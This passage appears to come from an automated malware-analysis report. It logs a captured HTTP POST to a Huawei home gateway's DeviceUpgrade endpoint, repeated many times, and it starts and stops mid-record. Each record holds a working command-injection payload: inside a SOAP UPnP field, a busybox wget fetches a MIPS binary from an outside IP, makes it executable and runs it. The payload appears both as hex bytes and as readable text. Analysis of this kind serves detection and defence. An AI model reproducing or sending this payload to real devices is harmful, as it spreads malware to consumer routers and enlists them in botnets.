huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 